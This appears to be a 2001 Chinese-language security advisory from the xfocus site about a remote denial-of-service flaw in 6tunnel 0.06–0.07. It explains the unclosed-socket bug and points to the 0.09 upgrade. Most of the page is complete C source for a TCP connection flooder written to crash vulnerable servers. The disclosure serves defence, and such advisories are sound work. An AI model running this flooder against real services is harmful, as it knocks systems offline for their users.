xfocus logo xfocus title
首页 焦点原创 安全文摘 安全工具 安全漏洞 焦点项目 焦点论坛 关于我们
English Version
 最近严重漏洞 
Microsoft RPC接口远程任意代码可执行漏洞
Cisco IOS接口不正确处理IPV4包远程拒绝服务漏洞
Microsoft Windows CreateFile API命名管道权限提升漏洞

6tunnel 存在远程拒绝服务攻击


发布时间:2001-10-24
更新时间:2001-10-24
严重程度:
威胁程度:远程拒绝服务
错误类型:设计错误
利用方式:服务器模式

受影响系统
6tunnel 0.06
6tunnel 0.07
详细描述
6tunnel是简单的通道类型程序,用来IRC代理。其中存在漏洞可以导致程序崩溃。

当客户端连接到6tunnel时打开的SOCKET没有很好的关闭,在一些情况下,当服务
程序关闭连接时候,socket会在一短超时下关闭。但是如果一客户端断开连接后
关闭,SOCKET会保留在CLOSE状态知道6tunnel被停止。因此通过过度使用连接/断开
方式可以使很多SOCKET不能关闭,而导致6tunnel崩溃。

测试代码
/*
* ipv4/ipv6 tcp connection flooder.
* Originally used as a DoS for 6tunnel (versions < 0.08).
* Version 0.08 is a broken version. Please update to 0.09.
*
* Description of options:
* -6    :    flood an ipv6 address.
* port :    tcp port to flood (default: 667)
* delay:    delay between connections (ms).
* times:    max number of connections (default: 2500).
*
* awayzzz <awayzzz@digibel.org>
* You can even find me @IRCnet if you need.
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>

#define DEFP    667        // default port.
#define DEFT    2500        // default number of connections.
#define TIME    100000    // delay between connections.
                            // tune it for best performances!

#define HAVE_IPV6

#define VALID_PORT(i)   (i<65535 && i > 0)

int main(int argc,char *argv[])
{

   int ret, fd, i, ip6 = 0;
   int times = DEFT, port = DEFP, delay = TIME;
   struct sockaddr_in sin;
  
#ifdef HAVE_IPV6
   struct sockaddr_in6 sin6;
#endif

   if( argc < 2 )
   {
       char *pname;

       if(!(pname = strrchr(argv[0],'/')))
          pname = argv[0];
       else
          pname++;

       printf("Usage: %s [-6] ip4/6 [port] [delay (ms)] [times]\n", pname);
       exit (0);
   }

   if(!strcmp(argv[1],"-6"))
   {

#ifdef HAVE_IPV6
      ip6 = 1;
#endif
      argv++;
      argc--;
   }

   if(argc > 2)
   {
      port = strtol(argv[2], NULL, 10);
      if(!VALID_PORT(port))
      {
         fprintf(stderr,"Invalid port number. Using default\n");
         port = DEFP;
      }
   }

   if(argc > 3)
      delay = strtol(argv[3], NULL, 10);

   if(argc > 4)
      times = strtol(argv[4], NULL, 10);

   printf("Started with %s flood to %s on %d for %d times!\n",
         (ip6 == 1) ? "ipv6" : "ipv4", argv[1], port, times);
    
   for (i = 0; i < times; i++)
   {
    
#ifdef HAVE_IPV6
      if(ip6)
      {
         fd = socket(AF_INET6, SOCK_STREAM, 0);
         memset(&sin6, 0, sizeof(sin6));

         sin6.sin6_family = AF_INET6;
         sin6.sin6_port = htons(port);
         inet_pton(AF_INET6,argv[1],sin6.sin6_addr.s6_addr);
      }
      else
      {
#endif /* HAVE_IPV6 */

         fd = socket(AF_INET, SOCK_STREAM, 0);
         memset(&sin, 0, sizeof(sin));

         sin.sin_family = AF_INET;
         sin.sin_addr.s_addr = inet_addr(argv[1]);
         sin.sin_port = htons(port);

#ifdef HAVE_IPV6
      }
      if(ip6)
         ret = connect(fd, (struct sockaddr *)&sin6, sizeof(sin6));
      else
#endif
         ret = connect(fd, (struct sockaddr *)&sin, sizeof(sin));

      if(ret < 0)
      {
         printf("connect %d failed.\n",i);
         perror("connect");
         break;
      }
      
      printf("Connection no. %d\n",i);
      close(fd);
      usleep(delay);
   }
}
/* :wq */

解决方案
升级程序:

ftp://213.146.38.146/pub/wojtekka/6tunnel-0.09.tar.gz

相关信息
awayzzz (awayzzz@digibel.org)
参考:http://archives.neohapsis.com/archives/bugtraq/2001-10/0200.html
Copyright © 1998-2003 XFOCUS Team. All Rights Reserved